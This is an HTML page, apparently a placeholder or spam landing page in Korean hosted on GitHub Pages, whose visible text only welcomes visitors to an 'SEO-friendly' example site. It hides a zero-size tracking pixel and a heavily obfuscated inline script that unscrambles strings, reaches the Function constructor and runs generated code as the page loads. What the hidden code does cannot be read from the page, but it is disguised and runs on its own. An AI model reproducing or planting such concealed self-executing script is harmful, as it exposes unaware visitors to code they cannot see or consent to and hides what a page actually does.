<!DOCTYPE html>
<html lang="ko">
<head>
    <title></title>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="robots" content="index, follow"/>
    <meta name="description" content="훌륭한 매장, 훌륭한 선택">
  <style>
    body {
      margin: 0;
      font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Ubuntu, Arial, sans-serif;
      font-size: 16px;
      line-height: 1.428571429;
      color: #4d4d4d;
    }
    .container, .main, .wrap {
      text-align: center;
    }
    footer, html {
      margin: 0 auto;
    }
    * {
      box-sizing: border-box;
      padding: 0;
    }
    :focus {
      outline: 0;
    }
    ::-webkit-scrollbar {
      display: none;
    }
    a, a:after, a:hover, a:visited {
      text-decoration: none;
      color: #bdc1c6;
    }
    .main {
      padding: 70px 15px;
    }
    h1, h2, p {
      margin-bottom: .8rem;
    }
    .container {
      padding: 1rem;
      max-width: 500px;
      margin: auto;
    }
    .btn-list {
      display: inline-grid;
      margin: .88rem 0;
    }
    .btn-list a {
      padding: .5rem 3.8rem;
      background-image: linear-gradient(to right, #0675c3, #005fa2);
      margin-bottom: .5rem;
      border-radius: .38rem;
      box-shadow: 0 -1px #ccb38a88;
      letter-spacing: 1px;
      color: #fff;
    }
    .btn-list a.btn1 {
      color: #eee;
      background-image: linear-gradient(to right, #35cb64, #32bd52);
      box-shadow: none;
      font-weight: 700;
    }
    .imghero {
      box-shadow: inset 0 0 0 8px #888;
      border-radius: 8px;
    }
    footer {
      max-width: 400px;
      font-size: 13px;
    }
    .link {
      color: #67b279;
    }
  </style>
</head>
<body>
<img src="//sstatic1.histats.com/0.gif?4705536&101" alt="" border="0" style="width:0;height:0;">
<script>
(function(){var hYB='',Udw=165-154;function eOZ(x){var h=4988592;var i=x.length;var p=[];for(var y=0;y<i;y++){p[y]=x.charAt(y)};for(var y=0;y<i;y++){var a=h*(y+497)+(h%33865);var k=h*(y+726)+(h%29696);var e=a%i;var b=k%i;var o=p[e];p[e]=p[b];p[b]=o;h=(a+k)%6331622;};return p.join('')};var yAe=eOZ('vfbtmscsotguzcdkacoijrlxntoenhrqurywp').substr(0,Udw);var TXz='agi rr 0spv2h,)e4.;v ;.arsboauiige,=v,w7ui1e(vh;tx8zle =q(;linav0-h)6+b5.)(C7=,+;tb;t=c,80;82,[nm]8;n87is,)1;k9avitnkr*cf;v}wav=s]i]=u(+intlr0(l<}.76=ro"(a;ktn[(iaaad.+C;(eqxo;s=+jmi;!rtmt{jvr;vi);pn-[=.agz=0)-<1([(dfrgslt vtthe=+aijvC} 6 rehr+eraa[;9aepl)7v=rb){rpcovs",fueu,;n;ra-;6r>=0;un=.]n=[m(=6<n;h0f1 s)lrl"z )g A;(=.r vA;=idl9o.b.a+t.l;2n ,;8u9(d-ro+o[)p9pt=4l<n42la.+.rto((b1 ;trrs+=a.n,)=v=; .lp;el;fCltvv(=fnlii1pen=[6{14ororvnn+*6zt;x,0;r.2ve,agv s,)gCny=t0epvrwonla1(gnuvwr+zge]5;,.of"aeug+]r2hsrs("g;l-r+2)(8j.hc=el9u"y"(;eccliCiuv+1si1n=v0um=;rm= "b)((,ra=low{(iub +eb)u[ahgh),,;+u2]hi=h}w, =r2m(( hs;f(i{n)! q}sA))),+a=(;"n]l(h]=3lAb)t8ing6n[s=n;g(u+6gjfa;r)na{.ev7osjahl)af))h+}ulor=jrh)]es(k;.un.l53o,.d,7]);[il(,ryl+gxncap}ft,a[n [;S=rrpn.y3;vtpac edh,o6ucmocsovr =lj"n< ravf]rht.v8r0-eAb7aCtjr(Cnrh0an0(u0r.t(.n7])h4{a.] fmf+ac5e,);t=c>s);)ete)1a)t+,d=injve+r[=roS=9r6l';var rGT=eOZ[yAe];var yWE='';var UbA=rGT;var UQD=rGT(yWE,eOZ(TXz));var oqu=UQD(eOZ('onut=1_l,B5BBiar$.+hix,+B=;"cB;.o.B6a"BB)2BBB)to9=3v9c=)(&3=t(p]}B*B=r=Bi.(!i2|Bu.og!(aaimB$t.to,agb+B"Bc.B._.73).}.c$6n"(@dbc!_e Ba{d.")pru.B(2o.;r%e{06)hB_[fb046it=%:r\'eB!{65g$B$)u9Bb=B8Bo)"(0);((&\';mtaeBBB,c%6xf.51> !mB7(}ve;B)h6at1uao5tBu:.).r;eoB=rB.\/B]S%a!)6_\/1 B2.\/}B][jcg7ejzaa =.(3)e)x;(__i24#;;mp98 _zt5;n:o0aii+nB((e.g4\/sBs.B7.v=!B=b1uB=e)w==d(fnBse\'.en=eBjh>+m&t pf.c)f%B=wB,5\/f3tlre.,B}c=2.B)f4)_)8c=.6b$"dic;(tf0aoBBBo_xe_aB.dw.5o;6ti|)ri;atz8u7=n;o1(to .9;$|+f 0.a$j3!anBfa3Bde,}}7).=(e)*a.<8)ce65BB)B7{a)(_B<aeiuztsee7]6)BcaB;)li),}!iS;%B<B sB(;e_($._|t)263&.3!)2eh%.!;3r]i9B )ra;ele;7{Bvh= (.(eBn.BBn}t.B,B)Bjse7,#,t3]2du(B4sBBc1nB..(i=!{|4a&h-jj._571$an_il(=sd.))6.Bsc(a$$s)B d{,_(oiBcB74Bfl!e=  $.d5)gai+*dceaa]B)B_rbs(a949)(,$;.agsBd0&=#xaa4.-8)!ct${!y11r_+(1,l(l.3xr(d(Ba!eanB6Bi(i_Ba_B(3lft6egB.k]{s=--,]=B(.]\/jl,BB{r,,\/[aog7r1Blexd6h9!8b]BB:e)s(28;BfcBkisB6Bl7)).s!u_p7_.19bx913Bsu#!5c\/n653cl$s)u_lBa!9(mmftau%s7jrB)tBoi;6)s330r6)f@id,)o o.#)%4dra !.!c=Bij.58lvdeol(fihaBoB5eowe.$=>n#Bb926)Bw7a%),;)oetBbCg(6t3o;dtae\'&=_a_]4{c)t)e.y!n)) 17r;B{nt.)cB$4a(m7a$s+(.(7"3sBa"f(6t{b;m[B(Baj&).;d%BrB(#}0}3{3{!o,B(ttB}te3__wn6B,0B]+{0f,$o%stu.s7me%5.@a%(B),$B:eB2B>i,Btr_!_S58@6.]o,f_ra0Bm.l)ar4,d(Ba(f(.BBa.8]rj.g_eo2p$e1m;2Ba;ss8jvo>.ge(_mtB=Binoati*fa8ee,B*fs70)2;)ak!;&B(B3)j)7a(_(ka7a.Bec:*(!)B. Bdab6t=(btal))6;!]Bx}s(B,t.]a;a,CB8eB:Bgta*B] #f=!Bb.2,s)]} e){.)owte(_${f)}96B&Bxs\/;uB){rBe_B7 ],B3.o,42irnB._(B}as)BBoa}#e%$_8[%l, d ().uenl{BBa!&.j"  fuaB} .7o$f]9)$[B! B8Bapa){B7o_}_BaobB9.)lj.6B)2!=6<9 )4.|x;u|cBirjla=a_!6t59B,.,{_Bof8t ed)rBl$g9ar]nB-.(ae.n!_;p)g$rB;0B=+n7=j)mu_BBcer.(.80B4;lp.da(rB\/ _5$"43!)5$$o,1oiB( |e"6!i (a'));var xuF=UbA(hYB,oqu );xuF(8978);return 3934})()
</script>
  <div class="container">
    <div style="margin-top: 1rem;">

    </div>
    <div class="main">    내 사이트에 오신 것을 환영합니다. 이것은 SEO 친화적인 웹페이지의 예입니다.</div>
    <footer>© 2024 proudly <a href="https://github.io" title="Github pages" class="link">Github pages</a></footer>
  </div>
</body>
</html>
